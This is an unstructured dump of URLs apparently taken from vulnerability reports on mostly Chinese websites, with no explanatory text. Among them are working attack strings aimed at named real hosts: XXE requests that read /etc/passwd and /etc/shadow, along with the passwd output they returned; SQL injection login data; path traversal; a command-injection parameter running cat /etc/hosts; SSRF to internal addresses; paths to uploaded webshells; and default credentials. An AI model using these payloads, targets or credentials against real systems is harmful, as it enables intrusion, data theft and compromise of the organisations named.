http://cmc.sysu.edu.cn/ http://222.200.173.172/fckeditor/editor/fckeditor.htm http://www.ahedu.gov.cn/search?option=all&searchtype=shbs&querycode=1427768180 http://www.ahedu.gov.cn/search?option=all&searchtype=shbs&querycode=1427768180 xmlns:content="http://purl.org/rss/1.0/modules/content/ xmlns:wfw="http://wellformedweb.org/CommentAPI/ http://nesc.cn/ubsiServlet?xml= file:///etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/cdrom:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin home:x:500:0::/home/home:/bin/bash abc:x:501:501::/home/abc:/bin/bash nba:x:502:502::/home/nba:/bin/bash http://jiaolian.51yund.com/ask/search?search=1 http://jiaolian.51yund.com/find/video?search=1 http://jiaolian.51yund.com/find/search?search=1 http://jiaolian.51yund.com/video/moreVideo/id/****/category_id/**** user:admin pwd:12345 https://github.com/chuckpu/BIAdmin/blob/25f80c8d1190da1be960f3cc968d852dda3b883f/src/com/changhong/admin/model/MailSend.java http://www.ymatou.com/ http://xt.brc.com.cn:8098/admin-console/login.seam Struts2:http://xt.brc.com.cn:8098/xt/logout.do XAMPP:http://app.brc.com.cn:8010/xampp/ http://**.**.**.**/chzwfw/main_goMain.do http://www.dfzq.com.cn/ubsiServlet?xml= file:///etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin http://**.**.**.**/xsguanzhu/index_show.dsn http://**.**.**.**/Guide/GuideDetail.aspx?module=4213&id=289 http://www1.ahedu.gov.cn/xinli/more.asp?NClass_Id=1 http://licai.iqianjin.com:88/uc_server/admin.php?m=user&a=login http://**.**.**.**/outweb-sbk/pages/login.jsp http://changyan.kuaizhan.com/login这个接口是搜狐畅言的登陆接口,登陆地方没有验证码限制 http://changyan.kuaizhan.com/detail/socia,说是引入社交平台的人气与流量的 http://oa.tongji.edu.cn/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 saps.sysu.edu.cn/search.asp post:keywords=1&Submit=%CB%D1+%CB%F7 http://202.116.74.202/detail.php?id=3378403 http://oa.21cn.com/messager/users.data http://taxi.qhfeidi.com/ http://www.crsdyy.com/sdgs/index.asp?buid=3701000110 https://myvip.gacfiatauto.com:8088/ http://leads.gacfiatauto.com http://www.sfea.com.cn/newsdetail.php?cid=232 http://cdn.5kcrm.com/Uploads/v0.5.1.zip http://183.221.33.85:8082/ http://www4.ahedu.gov.cn/ahedu2009/bszx/more.asp?sclass_id=1&Nclass_id=34 http://**.**.**.**/Customer/RetrievePassword.aspx http://my.shouliwang.com/MyAccount/MyAccountAjax.asmx/SaveAddress http://12345.my.gov.cn/myportal/pages/systemmanager/LoginSystemManager/authenticateByAccountPwd.do http://218.89.178.79:8020/my12345/pages/systemmanager/LoginSystemManager/loginoutByAccount.do http://218.89.178.79 http://www4.ahedu.gov.cn/ahedu2009//wmhd/zixun.asp?id=20 http://**.**.**.**/phpmyadmin/index.php http://222.240.193.170:8080/probiz/login.html http://218.28.233.118/acc/bindipmac/static_arp_action.php?arpIf=1%27 http://zhuanti.ahedu.gov.cn/xsyyc/more.asp?nClass_Id=1 http://zhuanti.ahedu.gov.cn/xsyyc/show.asp?id=126 http://zhuanti.ahedu.gov.cn/18da/show.asp?id=289 http://zhuanti.ahedu.gov.cn/2011jsj/more.asp?NClass_Id=1 http://zhuanti.ahedu.gov.cn/xfjs/more.asp?nClass_Id=1 http://zhuanti.ahedu.gov.cn/xfjs/show.asp?id=62 http://zhuanti.ahedu.gov.cn/ddcjx/show.asp?id=118 http://zhuanti.ahedu.gov.cn/lf/more.asp?nClass_Id=1 http://zhuanti.ahedu.gov.cn/xsyyc/more.asp?nClass_Id=1 http://www.openits.cn/ http://www.openits.cn/news.php?nid=1 http://its.sysu.edu.cn/在同一台服务器上,所以为中山大学的无误 http://**.**.**.**/web/yjy?id=38 http://210.72.226.39:12345/ site:jufangbian.com http://www1.ahedu.gov.cn/tzzx/vote/votedy.asp?id=1 http://119.167.156.251/fp4006/main.jsp http://www.bmie.neu.edu.cn/main/search?key=88952 http://www.bmie.neu.edu.cn/main/search?key=88952 http://sqlmap.org http://hq.fruitday.com:1300/test/ http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17 http://shop.innos.com/snsshop_admin/ http://www.ztegota.com.cn/ http://www.ztegota.com.cn/service/feedback.html http://**.**.**.**/Newspaper/PageNavigate.aspx?nid=1572 http://school.ahedu.gov.cn/schoollist.asp?sid=3415 http://school.ahedu.gov.cn/schoollist.asp?sid=3415 http://cart.suning.com/webapp/wcs/stores/servlet/SNMobileSaveCardAndCoupons http://**.**.**.**/showtpnews.php?id=239%27 http://**.**.**.**/cmswebuser/getRegFormList.do?now=2015-08-18+22%3A23%3A48.453 URL:http://**.**.**.**:80/cmswebuser/getRegFormList.do?&sql_name=1&sql_obligee=&sql_num=&sql_startDate=&sql_endDate=&curPage=1&count=10&sortOrder=desc&sortLabel=createDate http://**.**.**.**/wap/index.html http://**.**.**.**/jcontent.asp?id=128239 http://account.alicall.com/user/register.html http://love.mingdao.com/ www.xinmaochuangtou.com http://218.17.205.68:9090/home.jsp http://**.**.**.** http://**.**.**.**/Member/Login.aspx?exit=true http://**.**.**.**/ http://202.104.150.185/admin/overlook.php http://202.104.150.185/app/ https://222.223.213.36 http://202.120.189.131/ http://**.**.**.** http://115.238.68.245/ http://smart.sohu.com/downloads/sms?mobile_num=1 http://**.**.**.**/WFManager/login.jsp http://demo.ourphp.net/?cn-product-23.html=&type=a http://www.moko.cc/forgetPassword%7CupdatePhonePwd.action http://202.120.189.178/checklogin.asp postdata:usernamein=admin&passwordin='or%201=1-- http://**.**.**.**/onews.asp?id=210 http://**.**.**.**/onews.asp?id=210这个注入点 http://**.**.**.**/department/xkjsfzc/OtherView.asp?Id=33 http://**.**.**.**/NewsList.asp?classtwo=31 http://**.**.**.**/web/notice.jsp?id=80存在注入漏洞,参数id http://202.120.189.171/register http://sps.sysu.edu.cn/zsyx/content.asp?c=72&m=624&n=1330&todo=showinfo http://luyou.360.cn/activity/downLoadImg.php?url=https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superplus/img/logo_white.png&filetype=jpg&filename=360ProductSpecificationp-p1 http://luyou.360.cn/activity/downLoadImg.php?url=http://navsite.adsys.qihoo.net/?logo_white.png&filetype=jpg&filename=360ProductSpecificationp-p1 http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://10.121.95.65/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1 http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://10.121.95.65/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1 http://topic.muzhiwan.com/common/loginin/ http://sqlmap.org http://**.**.**.**/ http://**.**.**.**/index.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/网站的网上充值功能 http://www.sex-study.org/ www.sex-study.org/news.php?sort=1&isweb=1 http://msite.now.cn/ admin.php/themes/opt http://www.xbiao.com/app/showarticle/id/33042 http://www.xbiao.com/app/showarticle/id/33042* http://**.**.**.**:18090/wcc/,一样拿到shell。 http://ichtf.dbw.cn/ltd/product/product.php?id=4395 http://sn.whut.edu.cn/NewsDetail.aspx?infoId=1024 http://sn.whut.edu.cn/Admin/LoginAdmin.aspx http://www.masrcb.com/ http://www.masrcb.com/batch.common.php?action=modelquote&cid=2&name=members http://www.ymatou.com http://**.**.**.**/Users/Main/Search.aspx?campusCategoryId=1 http://new.edong.com/handler/shoppingcart/shoppingcart.ashx?action=AddHostShopping&buytype=2&dbspace=0&dbspaceproductid=0&languageid=0&lineid=0&period=0&periodtype=0&price=0&productid=0"a=0"aproductid=0&traffic=0&trafficproductid=0&typeid=0 http://new.edong.com:80/ http://poiop.sankuai.com/apply/duplicate?poiIds=6586722 https://101.71.254.218/cgi-bin/welcome http://oa.conbagroup.com:7791/ http://meijiamei.xiaozufan.com/meijiamei.zip http://www.lurongdai.com http://202.108.6.102/api/roll.php?callback=foo&dir1=102&dir2=303&dir3=303,304&length=10&page=1&subid=1432 http://www.lurongdai.com http://wx.yzdsb.com.cn/注册一账号,在这个页面进行测试。 http://product.biketo.com/ http://product.biketo.com/search.php?chid=101&shiherenqun=1&caid=3&ccid5=644&chejialeixing=1 http://**.**.**.**/web/ZxZx.aspx?Item_id=162 http://www.crcxf.com/ http://quan.sohu.com/login?urlto=%2Fuserpost%2Flink这个是搜狐旗下的一个站点,登陆的地方没有做验证码限制 http://its.zte.com.cn/univ/ cn:32770 http://www.xbiao.com/app/BrandIntro/t/android/bid/22 http://**.**.**.**/Default.asp http://**.**.**.**/default.asp http://**.**.**.**/bugs/wooyun-2010-0106928 http://**.**.**.**/bugs/wooyun-2010-088386 http://**.**.**.**/bugs/wooyun-2010-077177 http://**.**.**.**/bugs/wooyun-2010-077165 http://**.**.**.** https://github.com/JohnCny/oa/tree/1b6578d650546b489fd73d5afa577f4dbe9bb123 http://www.s10000.com/ubsiServlet?xml=%3C!DOCTYPE%20foo%20[%3C!ENTITY%20xxe%20SYSTEM%20%22file:///etc/shadow%22%3E]%3E%3Cubsi%20service=%22service%22%20method=%22method%22%3E%3Cobject%20type=%22Integer%22%3E%26xxe;%3C/object%3E%3C/ubsi%3E http://game.kuwo.cn/g/st/NewerIndex_2014这里,登陆位置没有验证码验证的机制 cds.sysu.edu.cn/AdminSysu/ http://meijiamei.xiaozufan.com/index.php?s=/Public/reg http://yingu1.xiaozufan.com/Account http://skb.ezu.cn/ebtcms/ebaitian_login.jsp http://skb.ezu.cn/show.jsp?id=109 http://www.chuyufood.com/ebtcms/ebaitian_login.jsp http://www.chuyufood.com/show.jsp?id=13 http://zsxx.hbcszyxy.cn/ebtcms/ebaitian_login.jsp http://zsxx.hbcszyxy.cn/show.jsp?id=183 http://www.trschem.com/ebtcms/ebaitian_login.html http://www.trschem.com/show.jsp?id=27 http://sc.nanet.cn:8181/ebtcms/ebaitian_login.jsp http://sc.nanet.cn:8181/show.jsp?id=14 http://www.trschem.com/ebaitiancms/ebaitian_login.jsp http://www.trschem.com/show.jsp?id=21 http://www.whladp.com/show.jsp?id=5 http://hbdmjt.cjxy.edu.cn/ebtcms/ebaitian_login.jsp http://hbdmjt.cjxy.edu.cn/show.jsp?id=16 http://www.jikexueyuan.com/member/changeEmail http://www.jikexueyuan.com/member/sendemail http://www.jikexueyuan.com/member/sendPhoneMsg http://cxdvbmanage.cxmd.net/workorderadmin/default.aspx http://cxdvbmanage.cxmd.net/WorkOrderList.aspx?WorkName=-1 http://cxdvbmanage.cxmd.net/Default.aspx?WorkID=285769 http://cxdvbmanage.cxmd.net/Default.aspx?WorkID=285770 http://nanjing.888ly.cn/Account/bill_detail_list?id=8621&page=2 http://nanjing.888ly.cn/OrderLog/order_details/number/NJ20158879120275 http://nanjing.888ly.cn/OrderLog/order_details/number/NJ20158810145553 http://101.200.0.198/Admin/Manage/Login http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// https://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// http://**.**.**.**/ubsiServlet?xml= file:/// www.renrenche.com http://**.**.**.**/shnewsshow.asp?id=26753 http://**.**.**.**/gjxfnewsshow.asp?id=26758 http://**.**.**.**/noticecshow.asp?id=22582 http://**.**.**.**/caseshow.asp?id=26215 http://**.**.**.**/jobsshow.asp?id=108 http://218.17.149.243:4567/manage/upload/upload.html http://218.17.149.243:4567/manage/upload/lyzx_image.jsp http://www.gyzq.com.cn:8081/manage/upload/upload.html http://www.gyzq.com.cn:8081/manage/upload/lyzx_image.jsp http://shouhou.renrenche.com/ http://**.**.**.**/index.php/Home/article/catePage/parentID/0/cat_id/1463* https://**.**.**.**/member/forget_pwd.htm,输入自己的手机号获取验证码。 http://**.**.**.**/manage/ http://**.**.**.**/manage/ https://mall.essence.com.cn/3g/osoa/views/pages/login/loginBase.html http://ceb.gmnc.org.cn/ http://bsb-yq.gmnc.org.cn/ http://hxb-xc.gmnc.org.cn/ http://meiji-info.gmnc.org.cn/ http://hxb-pf.gmnc.org.cn/ http://**.**.**.**/search/FileServlet http://**.**.**.**/search/project/projectLeft.jsp http://**.**.**.**/search/ProjectServlet http://**.**.**.**/wjjw/feeslicense/feeslicense.html http://**.**.**.**/wjjw/index/lyxq.jsp http://**.**.**.**/wjjw/other/consultCheck http://**.**.**.**/wjjw/other/reportCheck http://**.**.**.**/wjjw/search/project/projectLeft.jsp http://**.**.**.**/wjjw/search/project/table1.jsp http://**.**.**.**/wjjw/search/ProjectServlet http://**.**.**.**/wjsfglw/lgindex.jsp http://**.**.**.**/search/ http://**.**.**.**/search/FileServlet http://**.**.**.**/search/index.jsp http://**.**.**.**/search/name/table.jsp http://**.**.**.**/search/project/table1.jsp http://**.**.**.**/search/ProjectServlet http://**.**.**.**/wjjw/feeslicense/feeslicense.html http://**.**.**.**/wjjw/index/lylist.html http://**.**.**.**/wjjw/search/ http://**.**.**.**/wjjw/search/index.jsp http://**.**.**.**/wjjw/search/project/table1.jsp http://**.**.**.**/wjjw/search/ProjectServlet http://**.**.**.**/wjsfglw/ http://**.**.**.**/wjsfglw/wjgl/webEditor/upload/files/193128225153734165112206394314244622.jsp http://202.195.40.54:8080/ http://222.75.160.211:8080/ http://vgate.nwnu.edu.cn/ http://60.165.175.7:8080/ http://202.200.168.97/ http://202.116.192.41/ http://218.76.139.4:8080/ http://183.169.128.22:8080/ https://211.67.177.73/ https://mail.huanghuai.edu.cn/ http://218.75.26.87:8080/ http://210.32.43.230/ http://60.173.215.12:8080/ http://202.111.154.227:8080/ http://222.186.201.4:8080/ http://210.47.0.139:8080/ https://219.148.40.134/ https://mail.hecic.com.cn/ https://mail.julisolar.com/ https://mail.juligroup.com/ http://117.79.233.34:8080/ http://202.195.40.54:8080/ http://www.vko.cn/safety/getpwdbyphone.html http://adm.donews.com/ http://adm.donews.com:80/ http://**.**.**.**/users/password/new http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://open.sogou.com/index.php/tResource/xmltool address:sqlmap.py http://**.**.**.**/Service/GetSchoolOverview.ashx?TYPEID= http://**.**.**.**/Service/GetSchoolOverview http://**.**.**.** http://**.**.**.**/cgi-bin/DynamicPage.cgi http://**.**.**.**/cgi-bin/DynamicPage.cgi?template=../../../../../../../../../../etc/passwd http://yeyou.mop.com/payment/yee_mobile.aspx?code=UNICOM http://apicloud.com/getAllMdStore?startNum=0&size=15&platform=-1&type=0&subclass=0&order=0&searchByName=true&searchName=11 http://**.**.**.**/ http://mapi.miliyo.com/locations/update?_ua=i|8.3|0|30|appstore|9c60933948973dfe894d119f719f6294|1125|2001|1|cn|7969d3f0d4dc0d8d711af82c6832bf1d http://mapi.miliyo.com/home/index/?uid=48347109&_ua=i%7C8.3%7C1%7C30%7Cappstore%7C9c60933948973dfe894d119f719f6294%7C1125%7C2001%7C1%7Ccn%7C7969d3f0d4dc0d8d711af82c6832bf1d http://www.sysu-ys.com/shownews.asp?id=527 http://**.**.**.**/admin/index.asp http://**.**.**.**/admin/index.asp http://buy.ufida.com.cn/File/ http://buy.ufida.com.cn/images/ http://**.**.**.**/login.shtml http://ygjrex.sinosig.com/tabid/161/Default.aspx?returnurl=%2fdefault.aspx http://**.**.**.**/index.php?m=News&a=detail http://**.**.**.**/index.php?m=News&a=detail http://122.11.39.100:8080/zabbix/ http://**.**.**.**:10000/css/1111.csv http://**.**.**.** http://**.**.**.** http://115.29.100.114:8888/APP/suggest/suggest.jsp http://v.qq.com/bar/10291/?ptag=website.video.videodetail.web&platform=0 http://v.qq.com/bar/10291/post/6039781881996722892/comment http://**.**.**.**/cx/userzc.asp http://**.**.**.**/cx/userzc.asp http://oncloud2.quanshi.com/uccserver/uccapi/common/loglist http://oncloud2.quanshi.com/uccserver/uccapi/common/loglist?page=1&count=20&user_id=1267616&user_account=&description=&device_type=0 http://wap.cnmo.com/doc.php?docid=64850 http://**.**.**.**:8080/wscgs/default.aspx http://**.**.**.**/index.html http://**.**.**.**/ http://**.**.**.**/WifiBusInterface/transfer/line!getLineAll.action http://**.**.**.**/WifiBusInterface/one8.jsp http://**.**.**.**/WifiBusInterface/cmd.jsp http://**.**.**.**/shownews.asp http://**.**.**.**/shownews.asp http://www.wooyun.org/bugs/wooyun-2015-0135415/trace/120b8b8a812a0a46a132b4eb346d9254 http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://mag.yaochufa.com/order/order/orderlist http://mis.998.com:8065/Construct_Detail_New.aspx?projectid=17再次上传木马http://mis.998.com:8065/upfiles/635756074685719847wooyun.aspx http://open.lianlianpay.com/ http://open.lianlianpay.com/wp-content/uploads/2014/08/web_DEMO-2015-07-24-092030.rar https://zh.essence.com.cn/kess/pages/index.jsp http://boxadmin.lianlianbox.com/这个是后台地址 http://demo1.wangdaixitong.com?plugins&q=areas&name=&type=p,c&area=1 http://123.124.249.86/Login.aspx http://www.sinopectg.com/ www.codi.cc/admin http://visa.ilvxing.com/ucenter/user/updateUserinfo http://www.yiqifa.com/ www.anymacro.com http://www.hlslm.cn/AboutMe/id/57/p_id/31/f_id/39 http://www.hlslm.cn/Content/uid/16863 http://www.hlslm.cn/AboutMe/id/35/p_id/30 www.1v1buxi.net www.1v1buxi.org/huatong www.1v1buxi.org/zhongqing www.aicansi.com www.aicansi.com/huatong www.bf1v1.org www.bfdeu.com/zhongqing www.bfdeu.com/zhongqing2 www.bliuxue.net www.cpbo.cn/huatong www.k12-edu.org/zhongqing www.libro.cn/huatong www.mupingwang.com www.qzj999.com/zhongqing www.sdfyme.com/huatong www.tzun.cn/zhongqing www.ydy114.org/huatong http://**.**.**.** http://**.**.**.**/home/list.php?class_id=1 coding:utf-8 http://**.**.**.**/ http://**.**.**.**/webhtmlbjq/upload.asp http://**.**.**.**/login/index.asp http://www.hlslm.cn/AboutMe/id/38/p_id/30意见反馈 http://admin.hlslm.cn/Admin/Index/index#PayForm http://admin.hlslm.cn/Admin/Index/index#PayForm http://www.jzq001.com/admin.php?action=plugins&operation=config&do=48 http://www.jzq001.com/admin.php?frames=yes&action=plugins&operation=config&do=48 http://www.saike.com.cn/admin/ http://admin.hlslm.cn/Admin/Index/index#PayForm http://admin.hlslm.cn/Admin/Index/index#PayForm http://admin.hlslm.cn/Admin/Index/index http://221.193.221.207/admin/index.php?controller=AdminLogin&action=login http://221.193.221.207 http://channeldata.open.com.cn:8080/login.jsp http://124.127.180.196/library/login.action http://wsga.asga.gov.cn/edit/ewebeditor.htm http://gps.3g-elec.com/ http://wdc66.cn/lend/index.php?type=1 http://zzjz2.edong.com/news/class/index.php?author=&catid=0&key=&myord=dtime&myshownums=&page=2&showdate=&showtj= http://zsb.hrbcu.edu.cn/showInfo.php?type=xinxi&&id=318 http://zsb.hrbcu.edu.cn/admin/ http://www.sifangwy.com/ http://**.**.**.**/jiayou/changepwd.aspx http://**.**.**.**/console/login.aspx http://www.spider.com.cn/newuserjquery.action http://git.oschina.net/einsqing/wemall/repository/archive?ref=master http://tc.homelink.com.cn/ http://**.**.**.**/shownews.asp?id=91 http://edu.gd.chinamobile.com/网址 http://**.**.**.**/uploadfile/2013/1024/20131024021316226.txt http://**.**.**.** https://erp.cernet.com/ https://**.**.**.**/b3717898/AutoTestDemo/blob/a26d5c0fec942b6d7b438ac55352dbf15b8cbf9e/src/com/yum/boh/autotest/sele/demo/wang_xin/Test_wangxin.java http://**.**.**.** http://**.**.**.** http://**.**.**.**/xg.asp http://**.**.**.**/gajj_admin/admin_sysadmin/admin_sz_add.asp http://**.**.**.**/gajj_admin/cyzx_edit/admin_login.asp www.hlslm.cn http://channel.wepiao.com/index.php?r=public/register http://**.**.**.**/index.php?a=search http://www.zhengtugps.com/news_info.php?id=252 http://**.**.**.**/courses/courses_content.jsp?id=30 http://122.11.33.78/CdnDeleveMdfy.php?reload=1&cdnid=%22||cat%20/etc/hosts||echo%20%22ok http://m.houqiqi.cn/wap/usercenter.do?method=toUserOrderDetail&orderId=14768 http://m.houqiqi.cn/wap/usercenter.do?method=toUserOrderDetail&orderId=17868 http://**.**.**.**/install/ http://ilife.homelink.com.cn/aigou/?c=index&a=orderbuy&id=106714 http://translation.transn.com/loginAction!loginIndex.iol https://uniform.quanshi.com/rest/account/mobile/getConferencePassword http://**.**.**.**//api.php?op=dealer&act=get_city_list&province=120000 http://**.**.**.**:8000/OA_HTML/AppsLogin http://**.**.**.**//api.php?op=dealer&act=get_city_list&province=120000 http://**.**.**.**//api.php?op=dealer&act=get_city_list&province=120000 https://github.com/24hlighting/toolbox/blob/951feeef8e35f9b2f59ecee9416c4103dbefbe66/notes/%E8%B4%A6%E5%8F%B7%E7%AE%A1%E7%90%86.txt http://renpingqing@dev.highso.com.cn/svn/project/app/Android/ http://dev.highso.org/svn/project/public/产品/嗨学二期/ testin:lxpopo710@163.com http://liaoliangbin@dev.highso.org/svn/project/public/ wifi:SSID http://open.gaitu.com/ http://open.gaitu.com/admin http://www.5288.com/xxxx.asp?chrspbh=101378 http://**.**.**.**/chinfo/chuser/view.asp?id=37 http://**.**.**.**/admin/ http://wt.10006.info/login.jsp http://js.10006.info/kuandai.do?area=1 http://61.191.18.242:8080/oa/windex.jsp http://**.**.**.**/mail3.php http://cps.yaochufa.com/adefault/public/register http://cps.yaochufa.com/admini/cpsuser/index http://cps.yaochufa.com/admini#2_1 http://cps.yaochufa.com/admini/cpsuser/index http://www.hlslm.cn/ http://bbs.jzq001.com/forum.php?mod=viewthread&tid=46569 http://bbs.jzq001.com/space-uid-42985.html http://gps.3g-elec.com/loginpage/sanji/index.html http://www.hktv.tv/e/extend/say/p_index.php?classid=88&id=347&num=5&order=1&sub=60 http://www.cetools.cn/index.php/cetools/login弱口令蛮多的 http://**.**.**.**/notice.jsp?lbfl=btwj存在注入漏洞 http://opt.op.esf.sina.com.cn/login https://i.gtja.com/evercos/advertising/getSearchListBySign.json?matchtag=1 http://www.6816.com/ http://www.yaofangwang.com/ http://**.**.**.**/news_list.asp?parentID=1&type=1&topPage=1&keyWord= http://member.360hitao.com/member/ashx/myinfo.ashx?methods=Save&coun=CN&name=%u9A6C%u4E91&fN=Ma&lN=Yun&carid=&sex=0&pcode=CNBJ&ccode=null&mobi=13313362313&addr1=%u8FD9%u91CC%u662F%u4E4C%u4E91&add2=undefined&zipcode=111111&tel=&web=undefined&qq=&msn=undefined&remark=&ruEmail=wooyun11111@163.com&_=1440076644567 http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1 http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1 http://**.**.**.**/loginAction!userLogin.do http://opt.op.esf.sina.com.cn/ http://opt.op.esf.sina.com.cn/hotdot/findcode http://opt.op.esf.sina.com.cn/company/all http://opt.op.esf.sina.com.cn/company/communityall www.setv.sh.cn http://photo.shlll.net http://www.shlll.net http://wk.shlll.net http://renwen.shlll.net http://chongming.shlll.net http://**.**.**.**/bugs/wooyun-2010-077350 http://www.163disk.com/data/create.php http://**.**.**.**/?app_act=member/login_reg&type=login http://devtools.opera.com/../../../../../../../etc/hosts http://**.**.**.**/supplier/checkLogin.shtml;fxWLCookie=LC14VVvDmsVhpnQjLpbGtSV9TkGN8pTqltS0pXTqXCLKQDVGPv2w!-1500902718!NONE http://www.iapp.ruc.edu.cn/admin/login.asp http://www.iapp.ruc.edu.cn/xml/cms/.asp/201582071572049.gif http://wen.58.com/question/answer.html http://www.kuajing.com/article-23.html,如图所示: http://www.kuajing.com/index.php?act=order_query,输入订单号:7000000003274301,如图所示: http://www.zhihuiranqi.com/html/pc/third/rqjjfarqjjfarqxljcxt.html http://218.56.58.36:8401/log-form.action http://218.56.58.36:8400 http://m.dongchenghotels.com/app/userForget http://112.96.29.107/.svn/ svn:wc:ra_dav:version-url svn:wc:ra_dav:version-url https://115.29.226.98:10777/svn/unicom https://115.29.226.98:10777/svn/unicom https://gd.mail.chinaunicom.cn/ http://financehuawei.hiall.com.cn/data.rar http://localhost/chart/tmp-upload-images/m7lrv.php http://**.**.**.**/Help/Help.aspx http://**.**.**.**/ http://m.wingontravel.com/RestAPI/Wireless/banner?key=h5_page http://m.wingontravel.com/RestAPI/Wireless/banner?key=h5_page height:20px;BORDER http://**.**.**.**/nullshellname.jsp https://www.qh119.gov.cn/src/system/login.php?login_retry=true https://115.239.246.102/src/system/login.php?login_retry=true https://111.1.82.143/src/system/login.php?login_retry=true https://220.173.107.90/src/system/login.php?login_retry=true https://59.46.73.106/src/system/login.php?login_retry=true https://www.xn--3dsz23cqb341isz0akob.com/src/system/login.php?login_retry=true https://202.103.238.229/src/system/login.php?login_retry=true https://116.77.32.13:8443/src/system/login.php https://116.77.32.3:8443/src/system/login.php https://116.77.32.4:8443/src/system/login.php https://222.179.180.74:8443/src/system/login.php https://116.77.32.11:8443/src/system/login.php https://210.21.231.102/src/system/login.php https://116.77.32.12:8443/src/system/login.php https://116.77.32.10:8443/src/system/login.php https://116.77.32.2:8443/src/system/login.php https://120.196.138.212:8443/src/system/login.php https://218.93.17.154:8443/src/system/login.php https://218.25.140.137:8443/src/system/login.php https://124.93.200.105:8443/src/system/login.php https://218.26.248.71/src/system/login.php https://211.142.19.11/src/system/login.php https://202.97.152.130/src/system/login.php 